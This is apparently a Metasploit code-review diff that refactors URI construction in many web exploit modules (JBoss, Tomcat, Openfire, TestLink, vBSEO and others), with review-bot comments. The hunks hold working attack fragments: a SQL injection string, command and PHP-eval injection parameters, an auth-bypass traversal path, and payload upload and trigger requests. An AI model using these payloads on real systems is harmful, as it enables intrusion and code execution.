a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index d2ea9a7cc8a9..07d5eb2adaef 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -391,7 +391,7 @@ def auto_target end def query_serverinfo - path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo' + path = normalize_uri(datastore['PATH'], '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo') res = send_request_raw( { 'uri' => path, 
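Review bot: In jboss_bshdeployer's query_serverinfo the query string is passed into normalize_uri together with the path, while the same request in jboss_deploymentfilerepository and jboss_maindeployer appends it after the call. normalize_uri collapses "//" over everything it is given, so query text should stay outside it even though this particular string contains none. For consistency: `path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo'`.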
@@ -449,13 +449,13 @@ def invoke_bshscript(bsh_script, pkg) if (datastore['VERB']== "POST") res = send_request_cgi({ 'method' => datastore['VERB'], - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor', + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'), 'data' => params }) else res = send_request_cgi({ 'method' => datastore['VERB'], - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + params + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{params}" }, 30) end res diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 8808c158ffd9..422b8f83927b 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -277,14 +277,14 @@ def upload_file(base_name, jsp_name, content) if (datastore['VERB'] == "POST") res = send_request_cgi( { - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor', + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'), 'method' => datastore['VERB'], 'data' => data }, 5) else res = send_request_cgi( { - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + data, + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{data}", 'method' => datastore['VERB'], }, 30) end @@ -308,14 +308,14 @@ def delete_file(folder, name, ext) if (datastore['VERB'] == "POST") res = send_request_cgi( { - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor', + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'), 'method' => datastore['VERB'], 'data' => data }, 5) else res = send_request_cgi( { - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor;index.jsp?' + data, + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor;index.jsp') + "?#{data}", 'method' => datastore['VERB'], }, 30) end 
@@ -378,7 +378,7 @@ def auto_target def query_serverinfo - path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo' + path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo' res = send_request_raw( { 'uri' => path, diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index db63a96cb482..7c36c1fa1624 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -176,7 +176,7 @@ def exploit if (datastore['VERB'] == "POST") res = send_request_cgi({ 'method' => datastore['VERB'], - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor', + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'), 'vars_post' => { 'action' => 'invokeOpByName', @@ -189,7 +189,7 @@ def exploit else res = send_request_cgi({ 'method' => datastore['VERB'], - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor', + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'), 'vars_get' => { 'action' => 'invokeOpByName', @@ -275,7 +275,7 @@ def exploit print_status("Undeploying #{app_base} ...") res = send_request_cgi({ 'method' => datastore['VERB'], - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor', + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'), 'vars_post' => { 'action' => 'invokeOpByName', @@ -314,7 +314,7 @@ def on_request_uri(cli, request) def query_serverinfo - path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo' + path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo' res = send_request_raw( { 'uri' => path diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index bc195f03a921..bd825a7a004e 100644 
--- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -73,7 +73,7 @@ def on_new_session(client) def http_send_command(cmd, opts = {}) request_parameters = { 'method' => 'POST', - 'uri' => "#{@uri.path}script", + 'uri' => normalize_uri(@uri.path, "script"), 'vars_post' => { 'script' => java_craft_runtime_exec(cmd), @@ -150,7 +150,7 @@ def exploit print_status('Logging in...') res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{@uri.path}j_acegi_security_check", + 'uri' => normalize_uri(@uri.path, "j_acegi_security_check"), 'vars_post' => { 'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'), diff --git a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb index 0206ac51f754..98f2f7ebda21 100644 --- a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb +++ b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb @@ -66,7 +66,7 @@ def check res = send_request_raw({ 'method' => 'GET', - 'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php" + 'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php") }) if res and res.code == 200 @@ -87,14 +87,14 @@ def exploit print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)") send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php", + 'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php"), 'data' => php }) print_status("#{peer} - Requesting data.php") send_request_raw({ 'method' => 'GET', - 'uri' => "#{uri}admin/libraries/ajaxfilemanager/inc/data.php" + 'uri' => normalize_uri(uri, 'admin/libraries/ajaxfilemanager/inc/data.php') }) handler diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb index fbe992bc3af9..61f076de2f71 100644 
--- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb +++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb @@ -64,7 +64,7 @@ def check uri << '/' if uri[-1,1] != '/' base = File.dirname("#{uri}.") - res = send_request_raw({'uri'=>"#{base}/index.php"}) + res = send_request_raw({'uri'=>normalize_uri(uri, "/index.php")}) if res and res.body =~ /MobileCartly/ return Exploit::CheckCode::Detected else @@ -93,7 +93,7 @@ def exploit # print_status("#{@peer} - Uploading payload") res = send_request_cgi({ - 'uri' => "#{base}/includes/savepage.php", + 'uri' => normalize_uri(base, "/includes/savepage.php"), 'vars_get' => { 'savepage' => php_fname, 'pagecontent' => get_write_exec_payload(:unlink_self=>true) @@ -109,7 +109,7 @@ def exploit # Run payload # print_status("#{@peer} - Requesting '#{php_fname}'") - send_request_cgi({ 'uri' => "#{base}/pages/#{php_fname}" }) + send_request_cgi({ 'uri' => normalize_uri(base, pages, php_fname) }) handler end diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 96c4a846cb19..0347f055039e 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -98,7 +98,7 @@ def exploit end def http_send_raw(cmd) - path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi' + path = normalize_uri(target_uri.path, '/mt-upgrade.cgi') pay = cmd.gsub('\\', '\\\\').gsub('"', '\"') send_request_cgi( { diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index 4f4557bb8026..a7fc47a52b64 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb 
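Review bot: In mobilecartly_upload_exec.rb the rewritten trigger request calls `normalize_uri(base, pages, php_fname)` with `pages` as a bare identifier, where the removed line used the literal path segment `/pages/`. Unless a local or method named `pages` is defined outside this hunk, that raises NameError before the request is sent. The line should read `send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) })`. Separately, the `check` hunk in the same file now passes `uri` rather than the computed `base` to `normalize_uri`, which leaves `base` unused in the visible lines.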
@@ -89,10 +89,10 @@ def initialize(info = {}) end def check - base = normalize_uri(target_uri.path) + base = target_uri.path base << '/' if base[-1, 1] != '/' - path = "#{base}login.jsp" + path = normalize_uri(base, "login.jsp") res = send_request_cgi( { 'uri' => path @@ -183,7 +183,7 @@ def exploit data << "\r\n--#{boundary}--" res = send_request_cgi({ - 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin", + 'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?uploadplugin"), 'method' => 'POST', 'data' => data, 'headers' => @@ -201,7 +201,7 @@ def exploit if datastore['REMOVE_PLUGIN'] print_status("Deleting plugin #{plugin_name} from the server") res = send_request_cgi({ - 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}", + 'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?deleteplugin=") + plugin_name.downcase, 'headers' => { 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", diff --git a/modules/exploits/multi/http/php_volunteer_upload_exec.rb b/modules/exploits/multi/http/php_volunteer_upload_exec.rb index 3fa5bff9076b..1e95400a8056 100644 --- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb +++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb @@ -252,7 +252,7 @@ def exploit print_status("Trying file: #{f}") send_request_raw({ 'method' => 'GET', - 'uri' => "#{base}mods/documents/uploads/#{f}", + 'uri' => normalize_uri(base, 'mods/documents/uploads/', f), 'cookie' => cookie }) end diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index 7e1bee9ef4f4..6052a86061de 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb 
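Review bot: In the openfire_auth_bypass.rb `check` hunk, `base = target_uri.path` followed by `base << '/' if base[-1, 1] != '/'` now appends in place to the string returned by `target_uri.path`, where before it appended to the result of `normalize_uri`. Since `normalize_uri(base, "login.jsp")` joins the two parts itself, the append looks redundant and could be dropped, or `base` could be taken as a copy with `target_uri.path.dup` if the line is kept. Whether `target_uri` hands back a shared string is not visible here, so the aliasing is something to confirm rather than a known fault. The `check` hunk in testlink_upload_exec.rb has the same pair of lines.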
@@ -56,9 +56,7 @@ def initialize(info = {}) end def check - uri = normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'index.php' + uri = normalize_uri(datastore['URI'], 'index.php') res = send_request_raw( { @@ -74,9 +72,7 @@ def check end def get_session - uri normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'index.php' + uri = normalize_uri(datastore['URI'], 'index.php') res = send_request_raw( { diff --git a/modules/exploits/multi/http/phptax_exec.rb b/modules/exploits/multi/http/phptax_exec.rb index 3de593e6cd85..d0733a8efb1d 100644 --- a/modules/exploits/multi/http/phptax_exec.rb +++ b/modules/exploits/multi/http/phptax_exec.rb @@ -73,13 +73,12 @@ def check def exploit - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' + uri = target_uri.path print_status("#{rhost}#{rport} - Sending request...") res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}drawimage.php", + 'uri' => normalize_uri(uri, "drawimage.php"), 'vars_get' => { 'pdf' => 'make', 'pfilez' => "xxx; #{payload.encoded}" diff --git a/modules/exploits/multi/http/plone_popen2.rb b/modules/exploits/multi/http/plone_popen2.rb index 10c502fc7f53..1015e29dd69b 100644 --- a/modules/exploits/multi/http/plone_popen2.rb +++ b/modules/exploits/multi/http/plone_popen2.rb @@ -61,9 +61,7 @@ def initialize(info={}) end def check - uri = normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2' + uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2') res = send_request_raw( { @@ -77,9 +75,7 @@ def check end def exploit - uri = normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2' + uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2') send_request_cgi( { 
diff --git a/modules/exploits/multi/http/pmwiki_pagelist.rb b/modules/exploits/multi/http/pmwiki_pagelist.rb index 9bbbcb39674a..15526994829a 100644 --- a/modules/exploits/multi/http/pmwiki_pagelist.rb +++ b/modules/exploits/multi/http/pmwiki_pagelist.rb @@ -73,8 +73,7 @@ def exploit header = rand_text_alpha_upper(3) header_append = rand_text_alpha_upper(4) - uri = normalize_uri(datastore['URI']) - uri += (datastore['URI'][-1, 1] == "/") ? 'pmwiki.php' : '/pmwiki.php' + uri = normalize_uri(datastore['URI'], "pmwiki.php") res = send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index 39df154e4fe8..47959f1b7138 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -65,7 +65,7 @@ def check uri << '/' if uri[-1,1] != '/' base = File.dirname("#{uri}.") - res = send_request_raw({'uri'=>"#{base}/index.php"}) + res = send_request_raw({'uri'=>normalize_uri(base, "/index.php")}) if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m major, minor = $1, $2 return Exploit::CheckCode::Vulnerable if (major+minor).to_i <= 70 @@ -112,7 +112,7 @@ def login(base, username, password) # Login res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}/index.php/home/login", + 'uri' => normalize_uri("#{base}/index.php/home/login"), 'vars_post' => { 'login[email]' => username, 'login[password]' => password, @@ -187,7 +187,7 @@ def upload_php(base, opts) res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}/index.php/home/myAccount", + 'uri' => normalize_uri("#{base}/index.php/home/myAccount"), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'cookie' => cookie, 
@@ -205,7 +205,7 @@ def exec_php(base, opts) # When we upload a file, it will be renamed. The 'myAccount' page has that info. res = send_request_cgi({ - 'uri' => "#{base}/index.php/home/myAccount", + 'uri' => normalize_uri("#{base}/index.php/home/myAccount"), 'cookie' => cookie }) diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb index 830202444bdc..cf46bf92d7ac 100644 --- a/modules/exploits/multi/http/sit_file_upload.rb +++ b/modules/exploits/multi/http/sit_file_upload.rb @@ -64,12 +64,7 @@ def initialize(info = {}) def check - uri = normalize_uri(datastore['URI']) - if uri[-1,1] != '/' - uri = uri + "index.php" - else - uri = uri + "/index.php" - end + uri = normalize_uri(datastore['URI'], "index.php") res = send_request_raw({ 'uri' => uri @@ -91,12 +86,7 @@ def check def retrieve_session(user, pass) - uri = normalize_uri(datastore['URI']) - if uri[-1,1] == "/" - uri = uri + "login.php" - else - uri = uri + "/login.php" - end + uri = normalize_uri(datastore['URI'], "login.php") res = send_request_cgi({ 'uri' => uri, @@ -121,12 +111,7 @@ def retrieve_session(user, pass) def upload_page(session, newpage, contents) - uri = normalize_uri(datastore['URI']) - if uri[-1,1] == "/" - uri = uri + "ftp_upload_file.php" - else - uri = uri + "/ftp_upload_file.php" - end + uri = normalize_uri(datastore['URI'], "ftp_upload_file.php") boundary = rand_text_alphanumeric(6) @@ -187,12 +172,7 @@ def retrieve_upload_dir(session) def cmd_shell(cmdpath) print_status("Calling payload: #{cmdpath}") - uri = normalize_uri(datastore['URI']) - if uri[-1,1] == "/" - uri = uri + cmdpath - else - uri = uri + "/#{cmdpath}" - end + uri = normalize_uri(datastore['URI'], cmdpath) send_request_raw({ 'uri' => uri diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 4abf1ce64523..61d7a559d76c 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb 
+++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -264,7 +264,7 @@ def exploit print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...") res = send_request_cgi( { - 'uri' => "#{@uri}appliance/#{@jsp_name}.jsp", + 'uri' => normalize_uri("#{@uri}appliance/#{@jsp_name}.jsp"), 'method' => 'GET' }) diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index 28f3e0854e65..d91113a0653f 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -59,7 +59,7 @@ def initialize(info={}) def check - base = normalize_uri(target_uri.path) + base = target_uri.path base << '/' if base[-1, 1] != '/' peer = "#{rhost}:#{rport}" @@ -67,7 +67,7 @@ def check begin res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}login.php" + 'uri' => normalize_uri(base, "login.php") }) return Exploit::CheckCode::Unknown if res.nil? @@ -185,7 +185,7 @@ def exploit begin res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}lib/attachments/attachmentupload.php?id=#{id}&tableName=#{table}", + 'uri' => normalize_uri(base, "lib/attachments/attachmentupload.php") + "?id=#{id}&tableName=#{table}", 'cookie' => datastore['COOKIE'], }) if res and res.code == 200 @@ -221,7 +221,7 @@ def exploit begin res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}upload_area/#{table}/#{id}/" + 'uri' => normalize_uri(base, "upload_area", table, id) }) if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ @token = $1 
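Review bot: In sonicwall_gms_upload.rb the new call `normalize_uri("#{@uri}appliance/#{@jsp_name}.jsp")` still builds the path by interpolation, so it is only correct when `@uri` already ends in a slash; most other hunks in this patch pass the parts separately. `'uri' => normalize_uri(@uri, 'appliance', "#{@jsp_name}.jsp"),` would not depend on that. The `print_status` line above it prints `#{@uri}#{@jsp_name}.jsp`, which lacks the `appliance/` segment of the URI actually requested, so the status message and the request disagree. The interpolated single-argument form without a separating slash is also used in the two `exploit` hunks of egallery_upload_exec.rb, where `uri` is set outside the visible lines.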
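Review bot: In testlink_upload_exec.rb the request for the upload directory changed from `"#{base}upload_area/#{table}/#{id}/"` to `normalize_uri(base, "upload_area", table, id)`, which drops the trailing slash the old URI carried. The check right after it requires `res.code == 200`, so a server that answers the slash-less path with a redirect would no longer match, and the module would move on to the later `@token.nil?` branch. If the helper keeps a trailing slash on its last argument (as the openx_banner_edit.rb hunks with `'admin/'` and `'www/'` appear to assume), `'uri' => normalize_uri(base, "upload_area", table, "#{id}/")` preserves the old request. The surrounding `exploit` method starts and ends outside the hunk.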
@@ -238,11 +238,11 @@ def exploit # attempt to retrieve real file name from the database if @token.nil? print_status("#{@peer} - Retrieving real file name from the database.") - sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--" + sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--" begin res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}#{sqli}", + 'uri' => sqli, 'cookie' => datastore['COOKIE'], }) if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ @@ -263,7 +263,7 @@ def exploit begin send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{@token}.php" + 'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php") }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_error("#{@peer} - Connection failed") diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 5fdf162a99c1..a46cd2c033f5 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -198,7 +198,7 @@ def exploit # # UPLOAD # - path_tmp = normalize_uri(datastore['PATH']) + "/deploy" + query_str + path_tmp = normalize_uri(datastore['PATH'], "deploy") + query_str print_status("Uploading #{war.length} bytes as #{app_base}.war ...") res = send_request_cgi({ 'uri' => path_tmp, @@ -247,7 +247,7 @@ def exploit # # DELETE # - path_tmp = normalize_uri(datastore['PATH']) + "/undeploy" + query_str + path_tmp = normalize_uri(datastore['PATH'], "/undeploy") + query_str print_status("Undeploying #{app_base} ...") res = send_request_cgi({ 'uri' => path_tmp, 
@@ -263,7 +263,7 @@ def exploit end def query_serverinfo() - path = normalize_uri(datastore['PATH']) + '/serverinfo' + path = normalize_uri(datastore['PATH'], '/serverinfo') res = send_request_raw( { 'uri' => path diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb index 54565c898e8e..ca61aeed054a 100644 --- a/modules/exploits/multi/http/traq_plugin_exec.rb +++ b/modules/exploits/multi/http/traq_plugin_exec.rb @@ -58,8 +58,7 @@ def initialize(info={}) end def check - uri = normalize_uri(datastore['URI']) - uri += (uri[-1, 1] == "/") ? "admincp/login.php" : "/admincp/login.php" + uri = normalize_uri(datastore['URI'], "admincp", "login.php") res = send_request_raw( { @@ -75,8 +74,7 @@ def check def exploit p = Rex::Text.encode_base64(payload.encoded) - uri = normalize_uri(datastore['URI']) - uri += (uri[-1, 1] == "/") ? "admincp/plugins.php?newhook" : "/admincp/plugins.php?newhook" + uri = normalize_uri(datastore['URI'], "admincp", "plugins.php") + "?newhook" res = send_request_cgi( { @@ -92,8 +90,7 @@ def exploit } }, 25) - uri = normalize_uri(datastore['URI']) - uri += (uri[-1, 1] == "/") ? "index.php" : "/index.php" + uri = normalize_uri(datastore['URI'], "index.php") res = send_request_cgi( { diff --git a/modules/exploits/multi/http/vbseo_proc_deutf.rb b/modules/exploits/multi/http/vbseo_proc_deutf.rb index 5735349a01e8..3745fe16e3ef 100644 --- a/modules/exploits/multi/http/vbseo_proc_deutf.rb +++ b/modules/exploits/multi/http/vbseo_proc_deutf.rb @@ -55,9 +55,7 @@ def check flag = rand_text_alpha(rand(10)+10) data = "char_repl='{${print(#{flag})}}'=>" - uri = normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'vbseocp.php' + uri = normalize_uri(datastore['URI'], 'vbseocp.php') response = send_request_cgi({ 'method' => "POST", 
@@ -82,9 +80,7 @@ def exploit data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>" - uri = normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'vbseocp.php' + uri = normalize_uri(datastore['URI'], 'vbseocp.php') response = send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index f4ba74ac4203..e93870a0bf72 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -63,8 +63,8 @@ def check uri << '/' if uri[-1,1] != '/' base = File.dirname("#{uri}.") - res1 = send_request_raw({'uri'=>"#{base}/index.php"}) - res2 = send_request_raw({'uri'=>"#{base}/work/resultimage.php"}) + res1 = send_request_raw({'uri'=>normalize_uri("#{base}/index.php")}) + res2 = send_request_raw({'uri'=>normalize_uri("#{base}/work/resultimage.php")}) if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and res2 and res2.code == 200 @@ -111,7 +111,7 @@ def exploit print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}/work/resultimage.php", + 'uri' => normalize_uri("#{base}/work/resultimage.php"), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s }) @@ -121,7 +121,7 @@ def exploit return end - @target_path = "#{base}/results/#{fname}" + @target_path = normalize_uri("#{base}/results/#{fname}") print_status("#{peer} - Requesting #{@target_path}") res = send_request_cgi({'uri'=>@target_path}) diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index f2c8d8de11e4..000336b98be8 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb 
@@ -87,7 +87,7 @@ def check def get_cookie res = send_request_raw({ 'method' => 'GET', - 'uri' => "#{@base}wikka.php" + 'uri' => normalize_uri(@base, "wikka.php") }) # Get the cookie in this format: @@ -107,7 +107,7 @@ def get_cookie # def login(cookie) # Send a request to the login page so we can obtain some hidden values needed for login - uri = "#{@base}wikka.php?wakka=UserSettings" + uri = normalize_uri(@base, "wikka.php") + "?wakka=UserSettings" res = send_request_raw({ 'method' => 'GET', 'uri' => uri, @@ -163,7 +163,7 @@ def inject_exec(cookie) # Get the necessary fields in order to post a comment res = send_request_raw({ 'method' => 'GET', - 'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_comments=1", + 'uri' => normalize_uri(@base, "wikka.php") + "?wakka=#{datastore['PAGE']}&show_comments=1", 'cookie' => cookie }) @@ -189,11 +189,11 @@ def inject_exec(cookie) # Inject payload b64_payload = Rex::Text.encode_base64(payload.encoded) port = (rport.to_i == 80) ? "" : ":#{rport}" - uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment" + uri = normalize_uri("#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment") post_data = "" send_request_cgi({ 'method' => 'POST', - 'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment", + 'uri' => uri, 'cookie' => cookie, 'headers' => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" }, 'vars_post' => fields, @@ -202,7 +202,7 @@ def inject_exec(cookie) send_request_raw({ 'method' => 'GET', - 'uri' => "#{@base}spamlog.txt.php" + 'uri' => normalize_uri(@base, "spamlog.txt.php") }) end diff --git a/modules/exploits/unix/webapp/basilic_diff_exec.rb b/modules/exploits/unix/webapp/basilic_diff_exec.rb index 3fde5b946af7..c8a99cdb92fe 100644 --- a/modules/exploits/unix/webapp/basilic_diff_exec.rb +++ b/modules/exploits/unix/webapp/basilic_diff_exec.rb 
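Review bot: In wikka_spam_exec.rb `inject_exec`, the `Referer` header is built as `"http://#{rhost}:#{port}/#{uri}"` while `port` is already either empty or `":#{rport}"`, so the header comes out as `host:` or `host::port`. With `uri` now produced by `normalize_uri`, it probably also gains a doubled slash, assuming the helper returns a leading one. The header line is unchanged context, but the new `uri` assignment feeds it, so this hunk is the place to fix it. Suggested line: `'headers' => { 'Referer' => "http://#{rhost}#{port}#{uri}" },`. The method body continues outside the hunk.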
@@ -61,12 +61,11 @@ def initialize(info = {}) def check base = normalize_uri(target_uri.path) - base << '/' if base[-1, 1] != '/' sig = rand_text_alpha(10) res = send_request_cgi({ - 'uri' => "/#{base}/Config/diff.php", + 'uri' => normalize_uri("/#{base}/Config/diff.php"), 'vars_get' => { 'file' => sig, 'new' => '1', @@ -86,10 +85,9 @@ def exploit print_status("Sending GET request...") base = normalize_uri(target_uri.path) - base << '/' if base[-1, 1] != '/' res = send_request_cgi({ - 'uri' => "/#{base}/Config/diff.php", + 'uri' => normalize_uri("/#{base}/Config/diff.php"), 'vars_get' => { 'file' => "&#{payload.encoded} #", 'new' => '1', diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb index 772eeb722c0a..170db130fce6 100644 --- a/modules/exploits/unix/webapp/coppermine_piceditor.rb +++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb @@ -71,7 +71,7 @@ def initialize(info = {}) def check res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + '/picEditor.php' + 'uri' => normalize_uri(datastore['URI'], '/picEditor.php') }, 25) if (res and res.body =~ /Coppermine Picture Editor/i) @@ -98,7 +98,7 @@ def exploit res = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(datastore['URI']) + "/picEditor.php", + 'uri' => normalize_uri(datastore['URI'], "/picEditor.php"), 'vars_post' => { 'angle' => angle, diff --git a/modules/exploits/unix/webapp/egallery_upload_exec.rb b/modules/exploits/unix/webapp/egallery_upload_exec.rb index 58b051af1b8f..9dc2044cd7e1 100644 --- a/modules/exploits/unix/webapp/egallery_upload_exec.rb +++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb 